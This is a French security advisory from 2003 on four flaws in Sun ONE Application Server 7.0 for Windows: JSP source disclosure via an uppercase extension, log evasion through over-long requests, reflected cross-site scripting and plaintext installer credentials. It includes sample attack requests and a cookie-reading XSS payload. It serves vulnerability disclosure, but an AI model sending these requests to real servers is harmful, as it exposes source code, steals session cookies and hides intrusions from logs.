| 
                        
                          | Sun-One Application Server Multiple Vulnerabilities |   Date de Publication: 2003-05-28Titre: Sun-One Application Server Multiple Vulnerabilities
 K-Otik ID : 0121
 Exploitable à distance : Oui
 Exploitable en local : Oui
 
 
 * Description Technique - Exploit *
 
 Plusieurs vulnérabilités critiques touchent Sun-ONE Application Server sous Windows. La première est de type "JSP source code disclosure" : un attaquant peut voir les codes sources d'une application JSP en changeant l'extension de .jsp en .JSP.
 
 [Requête Normale]
 GET /hello.jsp HTTP/1.0
 
 [Réponse]
 HTTP/1.1 200 OK
 Server: Sun-ONE-Application-Server/7.0
 (more headers)
 
 <html>
 <head><title>Hello World JSP Example</title></head>
 <body>
 <h1>Hello World</h1>
 It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
 </body></html>
 
 [Requête .JSP]
 GET /hello.JSP HTTP/1.0
 
 [Réponse]
 HTTP/1.1 200 OK
 Server: Sun-ONE-Application-Server/7.0
 (more headers)
 
 <html>
 <head><title>Hello World JSP Example</title></head>
 <body>
 <h1>Hello World</h1>
 It is <%= new java.util.Date().toString() %> and is a beautiful Spring
 day.
 </body></html>
 
 La seconde faille est de type "Log evasion", elle permettrait à un attaquant de faire des requêtes qui ne seront pas logguées, puisque le serveur ne log que les 4042 premiers caractères d'une requête
 
 [Requête /hello.jsp]
 GET /AAAAAAAAAAAAAA[ plus de 4042 caractères]/../hello.jsp HTTP/1.0
 
 [Le Fichier log]
 172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /AAAAAAAAAA[plus de 4042 caractères] ...
 
 La troisième faille de sécurité (moins grave) est de type Cross Site Scripting :
 /webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script>
 
 La dernière vulnérabilité quant à elle, est de type "plaintext passwords" : le nom d'utilisateur et le mot de passe sont stockés lors de l'installation dans le fichier "statefile" en texte clair.
 
 
 * Versions Vulnérables *
 
 Sun-ONE Application Server 7.0 pour Windows 2000/XP
 
 
 * Solution *
 
 Aucune solution officielle pour l'instant.
 
 
 * Crédits *
 
 Faille découverte par l'équipe de SPI Dynamics (Mai 2003).
 |